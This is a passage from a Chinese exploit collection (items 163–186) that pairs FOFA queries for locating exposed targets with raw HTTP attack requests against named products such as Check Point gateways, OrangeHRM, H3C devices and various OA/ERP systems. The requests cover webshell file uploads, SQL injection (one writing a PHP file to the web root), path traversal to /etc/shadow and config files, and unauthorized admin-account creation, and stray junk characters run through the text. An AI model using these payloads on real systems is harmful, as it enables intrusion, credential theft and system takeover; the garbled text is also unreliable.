Accept-Encoding: gzip5 B, N" z+ d9 p" d( ~' o/ l
; N) I- ~9 G0 b) A( f------WebKitFormBoundaryeegvclmyurlotuey( w1 \3 s6 i) q3 O
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"3 ~' D; U4 g2 `) C' L+ t
Content-Type: application/octet-stream
$ @# @7 e' v5 B0 b8 s5 _& `7 V% _7 N! S' k
<% response.write("ujidwqfuuqjalgkvrpqy") %>
7 m# N" ]$ L5 r7 h/ |------WebKitFormBoundaryeegvclmyurlotuey- N! J# d' _! K4 L. }
Content-Disposition: form-data; name="action"
3 i% ~( h, D% f5 {
6 ^: ~' I9 N3 A5 _ q' jupload# {3 I3 Q2 s& C
------WebKitFormBoundaryeegvclmyurlotuey" j3 y# @! Y/ y
Content-Disposition: form-data; name="responderId"& x. ^0 j0 ?& B( U3 C7 [
' u; ?( F9 E* ?" V1 Z |, @$ |4 X
ResourceNewResponder. b& R( C6 Y7 E1 z3 E" d
------WebKitFormBoundaryeegvclmyurlotuey
; V) e) w' D+ D; U# L% d3 aContent-Disposition: form-data; name="remotePath", e4 r. o2 k8 z7 z, ], E9 Y
, _9 v, @; i4 q+ `/opt/resources
/ L; m7 W) r, Z+ ?+ u3 c------WebKitFormBoundaryeegvclmyurlotuey--0 Y! J. f+ ^1 g" q& c
6 O2 q+ n8 v0 y: Q* b) r$ K. E" B5 Z
http://x.x.x.x/opt/resources/kjuhitjgk.aspx0 w& W9 D+ f' T6 e, J
p A. R% c- N3 S0 q" s
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传7 i5 D- a: u3 M2 I+ K! c
FOFA: icon_hash="-795291075"
7 d) C/ y8 R. ~9 s$ m- IPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
8 Y& H+ |" p% u5 ?1 y4 n) nHost: x.x.x.x& ^1 U& g0 I# c E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36; u0 f4 |. h5 O. I- K
Connection: close: ~6 D( ~' W0 _2 l9 _; `. g
Content-Length: 293
9 [6 x1 d) |9 D- y' O( B& N8 ]Accept: */*3 K _0 E: Q Q) M5 ?, I
Accept-Encoding: gzip, deflate$ @: y: L7 O# [& p8 C
Accept-Language: zh-CN,zh;q=0.9
& `; {7 u- V- _1 f4 s" M3 fContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod& |- S" w1 k5 |; D% w
" l8 M+ k( F2 C8 r/ l0 X" s; i* g------iiqvnofupvhdyrcoqyuujyetjvqgocod
2 I2 X" E7 r7 L! {' IContent-Disposition: form-data; name="name"
0 s: E2 U3 A# ^) M; s5 T8 r' w6 [& p, n- K) g' [
1.php! v/ T8 F7 F3 V) m! q4 b: u
------iiqvnofupvhdyrcoqyuujyetjvqgocod3 \0 K# `. s" O$ H! K
Content-Disposition: form-data; name="upfile"; filename="1.php"
" [9 z) D/ K7 u7 z1 p! R& EContent-Type: image/jpeg
/ M& G+ X' j2 O H6 e y6 S% P
# Y9 ~3 L! a) t7 B2 g) s) drvjhvbhwwuooyiioxega
8 ~* R2 Y1 s/ h- D# L, b* [0 B" \------iiqvnofupvhdyrcoqyuujyetjvqgocod--$ Q$ m5 ~$ N3 U: C# r6 O
9 `; I V2 ]( P4 X+ B6 v8 o, g$ T; w
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传( e* ~% }: g0 E- o/ o4 _! C9 B
FOFA: title="智慧综合管理平台登入"/ g7 t$ }: v" E6 x1 b8 Y8 n( A
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
% [1 |$ A0 X6 \# Y% t, S7 VHost: x.x.x.x0 \, E9 N6 p8 k+ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
* F+ w2 }& s/ T4 {5 t$ X: `Content-Length: 288& ] q2 {% I% Z3 U) f) {
Accept: application/json, text/javascript, */*; q=0.01( d% G& }( P$ t; c, \3 u# E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,0 b. c/ ^4 Z0 G" N
Connection: close5 A3 @& r! `1 |# L
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl+ ~* c0 l$ I h( o9 w+ M" Q) c
X-Requested-With: XMLHttpRequest
- O7 K; h A6 AAccept-Encoding: gzip8 m+ k6 I+ T- F4 I' e, M5 Q! [( m5 _
( M+ Z& A% {& h5 b- B
------dqdaieopnozbkapjacdbdthlvtlyl8 E- R9 U2 ?3 X8 t S. g
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
4 K; \6 z1 _& `8 KContent-Type: image/jpeg
% g5 x Y1 z% {! ?. l; }( s$ Q6 ?( C2 h7 ]1 w( g
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
& N( X/ ~. c7 O' O- c& `------dqdaieopnozbkapjacdbdthlvtlyl--
3 A2 s1 L, }0 {( N1 k+ I$ c
M" Y; S7 I" T3 w: d3 Q2 ]$ z% T0 w0 A1 G
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
$ k$ c/ |; C- l9 r8 v$ y9 S+ f- O' [! J% L
165. OrangeHRM 3.3.3 SQL 注入# b- N' ~: h6 [2 ^) L
CVE-2024-36428- d4 T. f6 i9 K" W7 b
FOFA: app="OrangeHRM-产品"
! b& J$ Q# f/ m/ |. \) @7 T0 ?+ V& R* VURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
! x# F+ q* R" D3 E+ D2 q7 s! P- S, R H) T7 v0 v
$ N' `( q" z7 O
166. 中成科信票务管理平台SeatMapHandler SQL注入
. I: V# E9 X, l) aFOFA:body="技术支持:北京中成科信科技发展有限公司"
" i) {: v$ f+ Y7 Q8 {" `) d1 }POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.17 g# N- X6 T) {6 X0 V8 F" R
Host:1 s. v$ p% Y; e. a' p- p& {& k1 ?( ~9 w
Pragma: no-cache! T! u, m0 e6 ]
Cache-Control: no-cache$ D) P, W- d+ f0 S8 [
Upgrade-Insecure-Requests: 1, d0 w4 }+ m$ V2 P3 D# N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
# ~7 S& f" j1 M+ K U xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ `, s+ p1 v6 Y2 qAccept-Encoding: gzip, deflate! ^5 X, X" v. l- L
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ v/ s) S3 w8 T3 dCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE/ C1 ~% B$ y& }; R$ u' W
Connection: close
' r- ]( a) c9 Q% {! w, O& hContent-Type: application/x-www-form-urlencoded2 K: r$ Y7 \3 `' i8 }3 j3 B( y
Content-Length: 895 |. b6 ^0 j- ]4 j @* J+ Z
" e0 Q1 ^8 j7 z0 x0 Y$ @: |Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE8 N* o a- A1 ?2 {4 ]' ?
, L/ }' ?/ }/ r" h. u
; }, x G5 w, A, F3 a167. 精益价值管理系统 DownLoad.aspx任意文件读取
9 ~$ @- L. y5 j: w) w; Z% {FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"' X0 P$ }" |: J3 u O
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
# B& K7 g4 {9 Q+ F7 uHost:8 g5 q; u# A4 ^: I2 b5 R/ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 h8 r% c* R8 h5 R$ N+ h
Content-Type: application/x-www-form-urlencoded- L' ~0 x/ w$ Y0 @
Accept-Encoding: gzip, deflate
5 E' r3 W/ h: j+ o; ~. O6 c; tAccept: */*
" X3 T; b# \' K7 p1 { g; JConnection: keep-alive
1 z V# |4 @. c+ |. _" f( m; w: j! F, k6 ?
; @+ h* V# K: x168. 宏景EHR OutputCode 任意文件读取
8 K% h8 y- z7 q% J* ~; h7 c3 PFOFA:app="HJSOFT-HCM"8 n8 r" C: D6 j" U/ o
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1. i: Z" H6 [4 ~. ~5 C' F
Host: your-ip: q) l* j) g" l. J' M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
: ?' D/ r# e+ r3 fContent-Type: application/x-www-form-urlencoded
! x1 h- r' W2 x( t+ _* p' w/ DConnection: close
" @) n8 C, t% \2 [0 d$ o; g% }7 @- k+ v" ?; a0 p+ l) _
. t: G$ z- f/ D C% f/ j
2 x9 n# m3 M. O169. 宏景EHR downlawbase SQL注入
7 s; ^' u; l5 i1 C% \" J7 ]6 dFOFA:app="HJSOFT-HCM"0 `. y/ | ?4 [; U1 p# d: O J
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1' z* }: L+ ?! _' y
Host: your-ip, r7 ?3 x* X: G, @6 |7 [8 `0 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 k5 h0 z5 h0 q$ o/ T/ GAccept: */*8 c$ s& A; e1 g$ z5 T9 \* ~* \
Accept-Encoding: gzip, deflate" `- a- \2 [7 F' \% l) `" I
Connection: close8 L! K7 N* n1 j
2 v) w( C' c2 i2 e
& Z+ a" b5 d8 v% I4 p+ R
$ @# `+ O5 V1 t170. 宏景EHR DisplayExcelCustomReport 任意文件读取# j% l. B, b# @3 y' t0 v- O
FOFA:body="/general/sys/hjaxmanage.js"7 ]2 q7 E* @9 j! t- I
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1% p2 [+ N8 G' J x* r
Host: balalanengliang
) F/ z7 \' R6 D$ E2 c2 |/ ^4 NUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 a! ?( Q9 A2 v4 G T7 i' g$ `
Content-Type: application/x-www-form-urlencoded+ g2 v4 [# I! m8 L1 t( R
+ j/ `; p! m5 m' `/ S- H
filename=../webapps/ROOT/WEB-INF/web.xml# K4 n9 l, I# H- @- E+ e- p
' P& p3 q9 L' U. n8 U
9 B+ C0 ~: y! B7 a2 H
171. 通天星CMSV6车载定位监控平台 SQL注入
9 c2 P. I! R$ G$ s! tFOFA:body="/808gps/"
8 o: I& F2 k$ U5 J6 ~+ o! FGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
. @5 q" J! r$ F% t A% y2 QHost: your-ip
" J0 Y( \' g; O9 g) JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0! b( V9 O; f$ h: p7 V, i
Accept: */*
# E# A# U& |) s0 _6 ?2 p* \5 m1 z" |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 g+ G- p3 ~+ t# e5 ^/ k$ k
Accept-Encoding: gzip, deflate$ y7 K6 `8 P) l! X2 q& b) f. d/ x
Connection: close! f) D( C" Z9 Z9 S
4 R M: H$ ]% d0 \' h
# `2 G- @6 f( `
) J# I+ `, N8 C j7 s172. DT-高清车牌识别摄像机任意文件读取, k1 r" M' q% B. |
FOFA:app="DT-高清车牌识别摄像机"& j7 t# f0 _# D8 B
GET /../../../../etc/passwd HTTP/1.1! ?# p# x0 K* {" o9 U0 ~
Host: your-ip
) w, q. Y; w% @+ | hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- D5 b' c& ]" ~& `Accept-Encoding: gzip, deflate
1 M& P# U' ~0 yAccept: */*
1 ?: c/ \( U" X8 _5 @; {! MConnection: keep-alive
0 ~5 j6 U: C7 g: D+ I/ _6 I% V# o6 p
: y" c, u" c) c" K) O: @7 O) X4 C8 {" \% X4 [5 M6 k+ K0 H
/ d; D9 B: ]0 i: R1 w4 a1 \
173. Check Point 安全网关任意文件读取
6 N: m( y/ {* U" V0 BCVE-2024-24919
+ Q0 C- k& D* N, J) H1 B! ~! ~: LFOFA:app="Check_Point-SSL-Network-Extender"
7 G3 s+ s' \6 j/ Y9 S5 ~. IPOST /clients/MyCRL HTTP/1.1
* f$ x1 I1 Y+ ^7 f$ D6 DHost: your-ip: f, E; G! R5 }2 b- _6 k3 V9 j
Content-Type: application/x-www-form-urlencoded
8 P8 }. L/ d4 q$ [# A( `. M6 E$ H( U
* L7 M" p0 S. j8 R8 {aCSHELL/../../../../../../../etc/shadow
0 t" r' K% `+ G
1 R1 p1 t' ~" I& u7 [9 _
; W: a$ E6 q& x! ~; K& u7 B, L9 I* M+ p6 X2 K
174. 金和OA C6 FileDownLoad.aspx 任意文件读取$ y0 y/ _( {$ R7 c& u+ G9 X! j9 U
FOFA:app="金和网络-金和OA"5 l8 t8 w/ x; [: G
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.11 W) s, T" Z0 O. R6 d3 \( l& d' d
Host: your-ip0 d$ t5 T1 `; D5 f8 D8 W$ D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 \# K/ L0 g, F0 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& o a. q* ^0 O# T2 s
Accept-Encoding: gzip, deflate, br
' A: s9 D3 }: R* f+ a) y7 ?Accept-Language: zh-CN,zh;q=0.9# t e# E2 O# U: z; Y: c2 [
Connection: close
8 \- N9 R" `3 I' o% L& ]) x7 N9 T7 P3 `
/ b; W+ }0 _0 _2 |: G
+ @2 c: L; b$ D$ n175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入& i: r, `6 D' l! J; N, P
FOFA:app="金和网络-金和OA"
) d/ z( y# j1 r) _. K: gGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.10 n( o" A+ Q$ W& m# q! y
Host:2 I3 w% f3 N& t2 _' |# g
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
`: Z( O" f! m4 P3 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( I% m( F5 n9 E3 i+ o6 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 Y: d( _) R, D% P2 U
Accept-Encoding: gzip, deflate
5 y3 ~$ ] D ]% j( O, K9 h% }Connection: close
3 G1 P, T \5 b CUpgrade-Insecure-Requests: 1, A6 n( Q) r. ?- s2 A
. ^9 o9 J8 I! O( |* Y4 a; p
0 E% h( D( ?- e
176. 电信网关配置管理系统 rewrite.php 文件上传
8 u3 |8 x' ?1 Z7 P" dFOFA:body="img/login_bg3.png" && body="系统登录"& V" L E5 N* Q5 m& d5 c2 d
POST /manager/teletext/material/rewrite.php HTTP/1.13 v5 f8 Q4 k/ N x
Host: your-ip5 U" |: {6 U) R/ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
! O4 p" G) J; b3 `- q2 \) O0 FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
8 q. W( k: e6 c9 X. wConnection: close) Y; U: |* ~7 M$ r7 j( E8 v
( r5 @- ?* I$ V6 i2 |
------WebKitFormBoundaryOKldnDPT
% a; t8 U: d& T: yContent-Disposition: form-data; name="tmp_name"; filename="test.php"
4 n/ g* T1 s/ l" w' S$ }Content-Type: image/png
! s' `. r4 R7 o$ }, J 0 |) y% V. b! D2 ^
<?php system("cat /etc/passwd");unlink(__FILE__);?> F6 ~9 X( r( f+ r: D- e
------WebKitFormBoundaryOKldnDPT
, }, w6 E; D5 t6 T4 SContent-Disposition: form-data; name="uploadtime"8 \3 l% [: T3 ~9 t
- t' M' C; J$ C1 U8 X7 H% x + G+ x' {8 B( K& q
------WebKitFormBoundaryOKldnDPT--2 t, e) a+ V' E) I5 }+ y$ L/ }. M6 |% I
6 G' A1 o, H9 P! U. ~; T% L. O
1 z$ p* n3 L# e* u- M7 O' |, d
$ x U5 G* a) p; G177. H3C路由器敏感信息泄露
8 z5 L8 S* E1 x( b( a3 c/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
- e2 B6 U0 [+ u, k, b$ ?; [/userLogin.asp/../actionpolicy_status/../M60.cfg( w1 y! b' y* |8 j/ L, t- Q# i% T( ]
/userLogin.asp/../actionpolicy_status/../GR8300.cfg5 _* _4 C+ f& F
/userLogin.asp/../actionpolicy_status/../GR5200.cfg9 Z3 m6 v, j! E$ ~
/userLogin.asp/../actionpolicy_status/../GR3200.cfg% l- W. q/ Z! l3 C! G
/userLogin.asp/../actionpolicy_status/../GR2200.cfg% B8 t L9 F7 w: w8 A( ^8 i
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg2 n3 Q; m4 d% z" J6 ~3 H, n- r
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg& X5 z5 i- T/ }3 \) O' X1 r
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
$ y) _! i" O: }8 {/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
7 O9 C7 M/ _$ }: ~. \/userLogin.asp/../actionpolicy_status/../ER5200.cfg2 W: A6 s; R& u! o. ?+ a$ [1 V
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/ E5 i# e0 H* c1 K0 B- `1 R( [4 U/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg9 h- c/ h: t8 O6 d4 Y0 O: R( p
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
0 c" Q4 v: N* W9 S$ q1 ?& }" X/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg! j& I$ e6 y, g3 T" I1 h% k
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/ b* \* d- v0 U! o/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
L. W. o; i( s/userLogin.asp/../actionpolicy_status/../ER3108G.cfg: J0 n4 [5 s X3 r
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
: q* X& \+ y4 b9 P9 @9 |/userLogin.asp/../actionpolicy_status/../ER3100.cfg9 a- `4 Z7 Y" X
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
. B, P7 c' ]5 d& v9 p4 x) X0 K+ e, a! |% M0 q
% I0 _4 B8 v# P8 X178. H3C校园网自助服务系统-flexfileupload-任意文件上传) P# p/ p$ m$ C* N
FOFA:header="/selfservice"/ ~, ?& c/ c' A3 T; y! _9 I
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
7 y! M6 p: v& K7 eHost:& ^& R. ]1 s+ F4 c- z F; o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: k! W, }" Q* _# h$ C5 ]
Content-Length: 2529 ~5 u! S4 t' L. ~6 k
Accept-Encoding: gzip, deflate
. L( G5 n- g. L1 ]* Y9 m' iConnection: close$ F9 @& z7 F7 |/ N6 j" u' H4 V
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l9 T6 ~6 }/ k- T" X, y+ J8 Q
-----------------aqutkea7vvanpqy3rh2l# @0 R/ ]5 ` @" @" `
Content-Disposition: form-data; name="12234.txt"; filename="12234"
% O' f# ^. Y+ q4 x' V. NContent-Type: application/octet-stream
' a8 L/ D% ~- c. t: ?Content-Length: 255) B8 d$ @; z6 ^) A9 n# ?
7 V, C* q* ^# Q/ I, H2 Y
122340 q3 n! ^ n) ]; E6 j
-----------------aqutkea7vvanpqy3rh2l--
1 | R V: Q' w8 Z" I- U: Z# A/ D. y* F" ~# i) Z
* d7 {) w9 ?# F3 WGET /imc/primepush/%2e%2e/flex/12234.txt; A, C' f6 N* E- M4 P/ B
4 N$ i: k4 b" r2 i* X/ _
' }% v1 S& p$ p3 q179. 建文工程管理系统存在任意文件读取! m0 R) @; l/ v! J% @0 O# f
POST /Common/DownLoad2.aspx HTTP/1.1
8 E' g! E8 M% W7 ?- X9 HHost: {{Hostname}}' C- J! j0 A+ N6 B2 Q
Content-Type: application/x-www-form-urlencoded
' I3 |5 ]; b2 U8 d( ?- OUser-Agent: Mozilla/5.0
" W7 C1 c) C7 u' ` X- r1 X! O7 ^2 {- w" t: d9 ^0 S0 N
path=../log4net.config&Name=
! c8 S1 K2 l7 ~( B, f* o6 F8 B- E& v3 U
3 g, i( f5 F9 Z1 \+ _2 _1 e
180. 帮管客 CRM jiliyu SQL注入7 a7 `: R- E% A) t: b S' x
FOFA:app="帮管客-CRM"# ], M# j9 w! R% A' s
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1; ~) F4 v# i+ e `2 L4 f O, x) Y
Host: your-ip4 \+ F: z# c& \7 d- v& }" m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 u" ~/ ]0 j4 }3 F, v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! |; D4 \' f6 [) j( B: k" A
Accept-Encoding: gzip, deflate
+ h0 `. u; L! c8 M: J8 f0 AAccept-Language: zh-CN,zh;q=0.96 h5 N. @$ k, [2 A$ ^& A$ X
Connection: close& G7 R7 L7 t, ?- e
1 |8 Y' V2 d8 w0 B2 R4 [
9 h6 H; b( b4 ?( X+ J" h- @3 R181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入$ u: N! j6 o% H0 N+ }
FOFA:"PDCA/js/_publicCom.js"
& e+ ]( x+ ]& g6 S: J, D* \* \POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.14 q* B4 I9 q6 J" B4 ^& ?
Host: your-ip
0 S$ W4 Z1 Z+ d* YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: w" w* A. R1 \4 x% `: EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ F( A- @5 G1 F' F6 r5 h% F
Accept-Encoding: gzip, deflate, br
. M' G& _) @* @$ y( u; A. YAccept-Language: zh-CN,zh;q=0.9( b0 L0 S7 ~4 Z) r" `2 U: I9 u
Connection: close
6 m0 k$ D7 |8 w3 Q6 z o4 f3 HContent-Type: application/x-www-form-urlencoded7 a' h8 v: C4 p3 i
1 ]4 }6 }) s4 ^* C4 Z
t/ z$ t6 f! z4 d% F; maction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20/ I2 y: G% K. _0 ]. a
' | k; }3 I% ?9 q- o
8 r1 c; K+ }( v* v8 W, z" j182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建% t2 _' h* x% t9 T
FOFA:"PDCA/js/_publicCom.js"
1 d. a4 \' p/ n5 V( Q; h% W4 M$ T5 RPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
' V$ J- P, {& ]& l H! F0 vHost: your-ip( k" `" u! Y' o% r$ ^' O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
i% p' p& O' Z6 C$ r+ y6 a# m/ M& eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ w B# r2 @0 L2 ?
Accept-Encoding: gzip, deflate, br
9 L8 w5 T9 B! x2 Q P/ eAccept-Language: zh-CN,zh;q=0.9
" `9 b! Y3 b( A2 x3 ]Connection: close+ ]- ]9 [+ t- w7 [
Content-Type: application/x-www-form-urlencoded& ?1 k8 z( h1 a) j m0 \
9 U( Z0 e8 \6 h- L3 W/ Q
9 e7 f" W G4 k8 z4 ^- f- ausername=test1234&pwd=test1234&savedays=1
" O; x4 h& \; ?% Q
3 G6 [( u. q" V. c5 o. o1 _- ]
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入& k8 P- F; J. H1 X2 S6 ?; Y6 c
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"+ f( K* o' Y2 o2 `- A2 {# O
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.18 p1 a) n- w( @7 X% o
Host: your-ip
& ]! s9 F- B3 C) v# d. aUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
7 n& Z0 U6 L' I, Z. M- B3 {Accept-Charset: utf-8
& F8 E2 t/ p0 H0 mAccept-Encoding: gzip, deflate
5 A! a" L' ^& @! C; x" d4 dConnection: close2 Q) W% b, }' l. Y6 y
2 J7 j: e9 k( J/ ]
* M% z6 U+ o5 Z5 C
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加. e# @4 Z7 J5 ?' e6 t
FOFA:server="SunFull-Webs"
$ E: N0 a- O& X; i9 TPOST /soap/AddUser HTTP/1.1" k& ^( c2 c, ?' s2 d" T0 u
Host: your-ip9 P+ t& b5 R: }- k8 a+ H7 ^9 {* ^
Accept-Encoding: gzip, deflate( f- x+ M+ K5 N9 F* G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0. G& s9 i- U0 _
Accept: application/xml, text/xml, */*; q=0.01
% ^6 @! D4 n1 w- c4 F2 \/ PContent-Type: text/xml; charset=utf-8: |( \* q2 q' y% S, C! ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# d2 l- ?, T0 h F% @% K$ t1 YX-Requested-With: XMLHttpRequest
: T3 I& j: v- X5 ~( i: l5 {/ T; |4 V9 e9 v% J' Y
( v! o- Q5 _6 \5 W# z; finsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')$ o, t: e+ _, Z& f7 h8 K
2 I5 }. I; e3 I/ _0 Y; R3 {2 q
5 D8 T/ ]% Y" o, F9 E! F
185. 瑞友天翼应用虚拟化系统SQL注入
1 Q: Q' J. d% X" `3 z v, tversion < 7.0.5.1& {5 ~8 \! |. p( k4 h U
FOFA:app="REALOR-天翼应用虚拟化系统"3 U9 o8 s4 I/ B0 p/ }; p9 V
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1 ~7 w& g6 K/ e) _
Host: host$ z) @9 u N1 d$ y
/ H) H5 ~* h9 D# H. D
) R- b( r3 c$ k6 @0 W' a" r$ K
186. F-logic DataCube3 SQL注入 `, ^. @5 h4 q& r! }
CVE-2024-31750! Z6 ?- n; Y+ |$ x6 M- z! c
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统( {: r, s- F4 X. \( i" F9 |4 l7 J( A
FOFA:title=="DataCube3"6 z" X8 W" A& _! Z- b& z
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
5 o- L5 s2 B# W |& [Host: your-ip1 N4 r. {8 \1 _; M& p- |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0) J! U4 L- I, @2 M1 G8 A6 \
